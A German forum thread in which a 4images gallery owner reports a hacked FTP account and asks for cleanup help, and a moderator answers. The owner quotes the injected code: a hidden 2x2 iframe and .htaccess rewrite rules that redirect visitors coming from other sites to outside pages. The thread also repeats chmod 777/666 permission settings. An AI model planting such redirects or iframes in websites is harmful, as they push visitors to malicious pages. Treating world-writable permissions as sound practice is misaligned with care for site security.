4images Forum & Community
Welcome, Guest. Please login or register.
Did you miss your activation email?
August 30, 2014, 10:11:49 AM

Login with username, password and session length
Search:     Advanced search
4images is now on facebook. Click here and become a fan!
Togle to toolbar
Translate this page with =>
Translate this page >
* Home Help Search Login Register
 
+  4images Forum & Community
|-+  4images Issues / Ausgaben
| |-+  Discussion & Troubleshooting (Moderators: Acidgod, ivan, Rembrandt)
| | |-+  FTP-Zugang wurde gehackt und Dateien manipuliert
0 Members and 1 Guest are viewing this topic. « previous next »
Pages: [1] Print
Author Topic: FTP-Zugang wurde gehackt und Dateien manipuliert  (Read 1741 times)
Tbone
Pre-Newbie

Offline Offline

Posts: 3

Thank You
-Given: 0
-Receive: 0


View Profile
« on: December 03, 2012, 09:23:04 PM »

Hallo
Meine der FTP-Zugang meiner HP und viele PHPs und auch andere Dateien wurden manipuliert die Dateirechte wurden verändert (z.B. die index.html im Ordner galerie/data/thumbnails sah so aus:
<html>
<head>
<title></title>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=xxx: biggtimeincxxx: /hmiu. html></iframe></body>
</html>

Selbst die .htaccess-Dateien in diversen Ordnern sahen so aus:

<IfModule mod_rewrite.c>
   RewriteEngine On
   RewriteBase /
   RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
   RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
   RewriteRule ^.*$ xxx: biggtimeincxxx: /hmiu. html [L,R]
</IfModule>

<IfModule mod_rewrite.c>
   RewriteEngine On
   RewriteBase /
   RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
   RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
   RewriteRule ^.*$ xxx: creatives. co. in/hmiu. html [L,R]
</IfModule>


Ich habe einfach alle betroffenen .htaccess-Dateien gelöscht (falls das eine falsche Maßnahme war, bitte ich um Verbesserungsvorschläge).

Ich habe alle anderen betroffenen Dateien durch ältere gesicherte Versionen überschrieben und meine HP scheint wieder ordnungsgemäß zu funktionieren.

Jetzt habe ich noch zwei Probleme:
1. Ich weiß nicht mehr welche Dateirechte die Dateien in den verschieden Ordnern haben müssen/dürfen. Ich denke, daß vor allem die PHPs eher kritisch sind.
Ich habe bereits wie in der Installationsanweisung beschrieben, gehandelt:

5. Setzen die angegebenen Zugriffsrechte für folgende Verzeichnisse:

     chmod 777 (drwxrwxrwx) : data
     chmod 777 (drwxrwxrwx) : data/database
     chmod 777 (drwxrwxrwx) : data/media
     chmod 777 (drwxrwxrwx) : data/thumbnails
     chmod 777 (drwxrwxrwx) : data/tmp_media
     chmod 777 (drwxrwxrwx) : data/tmp_thumbnails
     chmod 777 (drwxrwxrwx) : templates
     chmod 777 (drwxrwxrwx) : templates/default
     chmod 777 (drwxrwxrwx) : templates/default/media
     chmod 777 (drwxrwxrwx) : templates/default_960px
     chmod 777 (drwxrwxrwx) : templates/default_960px/media
     chmod 777 (drwxrwxrwx) : templates/default_full
     chmod 777 (drwxrwxrwx) : templates/default_full/media  

     Setzen die angegebenen Zugriffsrechte für folgende Dateien:

     chmod 666 (-rw-rw-rw-) : alle Dateien im Verzeichnis "templates/default"
     chmod 666 (-rw-rw-rw-) : alle Dateien im Verzeichnis "templates/default/media"
     chmod 666 (-rw-rw-rw-) : alle Dateien im Verzeichnis "templates/default_960px"
     chmod 666 (-rw-rw-rw-) : alle Dateien im Verzeichnis "templates/default_960px/media"
     chmod 666 (-rw-rw-rw-) : alle Dateien im Verzeichnis "templates/default_full"
     chmod 666 (-rw-rw-rw-) : alle Dateien im Verzeichnis "templates/default_full/media"          

Aber wie sieht es mit den restlichen Dateien in den anderen Ordnern aus?????

2. Ruft manmeine HP (gerdverhoeven. de) im IE auf funktioniert alles wie gewollt. Im Firefox bleibt eine weisse Seite ohne irgendeinen Hinweis. Erst wenn ich im Firefox gerdverhoeven.de/galerie/index.php eingebe erreicht man das gewünschte Resultat. Meine Vermutung ist, daß die default.html im rootverzeichnis nicht mehr funktioniert (sie war auch manipuliert und meine Reparaturversuche waren vielleicht nicht erfolgreich).
Meinedefault.html sieht so aus:

<meta name="Author" content="Gerd Verhoeven">
<meta name="Publisher" content="Gerd Verhoeven">
<meta name="Copyright" content="Gerd Verhoeven">
<meta name="Keywords" content="foto, fotos, bild, Verhoeven, Musik,">
<meta name="Description" content="Auf dieser Homepage dreht sich alles um das schöne Hobby der Fotografie., ">
<meta name="Page-topic" content="Fotografie">
<meta name="Audience" content="Alle">
<meta name="Content-language" content="DE">
<meta name="Page-type" content="Bilder/Fotos">
<meta name="Robots" content="INDEX,FOLLOW">
<meta http-equiv="refresh"content="0;URL=xxx: gerdverhoeven. de/galerie/index. php">


Ich hoffe auf Hilfe!

Vielen Dank im Voraus

Grüße

Gerd

Logged
Rembrandt
Moderator
4images Guru
*****
Offline Offline

Posts: 4045

Thank You
-Given: 105
-Receive: 850

Vienna


View Profile WWW
« Reply #1 on: December 03, 2012, 09:32:11 PM »

Willkommen im Forum!

Auch im FF funktioniert deine Seite, lösche mal den Browsercache.

Zu den Dateirechten, lade ganz einfach irgend eine Datei hoch und schau welche rechte diese Datei bekommen hat, diese rechte vergibst du ganz einfach den anderen.
Noch etwas zu dem Hack, hast du auch deinen Rechner auf Trojaner und Co überprüft?

mfg Andi
Logged

Meine 4Images Modifikationen  Now over 100 Modification Online!    Meine 4images Demo Seite


Please do not PM me asking for help unless you've been specifically asked to do so. Such PMs will be deleted without answer. (forum rule #6)
Tbone
Pre-Newbie

Offline Offline

Posts: 3

Thank You
-Given: 0
-Receive: 0


View Profile
« Reply #2 on: December 03, 2012, 09:46:48 PM »

Hallo Andi
Vielen Dank erstmal.
Also alle anderen Dateien (inklusive der PHPs im Admin- und Includes-Ordner) können die Rechte 644 besitzen?

In meinem FF habe ich den Cache gelöscht und nach wie vor habe ich eine weisse Seite bei Eingabe von gerdverhoeven.de .

War das in Ordnung einfach die .htacces - Dateien zu löschen?
Und ist meine default.html so in Ordnung?

Auf meinem Rechner wacht Kaspersky und der hat bis jetzt noch nichts gefunden (die Suche läuft noch), reicht das aus? oder sollte ich noch ein anderes Programm benutzen?

Grüße

Gerd
« Last Edit: December 03, 2012, 09:59:04 PM by Tbone » Logged
Rembrandt
Moderator
4images Guru
*****
Offline Offline

Posts: 4045

Thank You
-Given: 105
-Receive: 850

Vienna


View Profile WWW
« Reply #3 on: December 04, 2012, 04:38:41 AM »

Kaspersky, ist sicher in Ordnung.
Die Meta angaben gehören in die "header.html" zwischen den tags "head" .
<head>
<meta ... >
<meta ... >
</head>

aber das kannst du dir ja bei der aktuellen 4images Version ansehen.

4images benötigt keine htaccess Datei aber dein Server vielleicht, oft werden über die htaccess Servereinstellungen vorgenommen.

mfg Andi
Logged

Meine 4Images Modifikationen  Now over 100 Modification Online!    Meine 4images Demo Seite


Please do not PM me asking for help unless you've been specifically asked to do so. Such PMs will be deleted without answer. (forum rule #6)
Pages: [1] Print 
« previous next »
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF | SMF © 2013, Simple Machines Valid XHTML 1.0! Valid CSS!
Page created in 0.128 seconds with 20 queries.
Post your comments here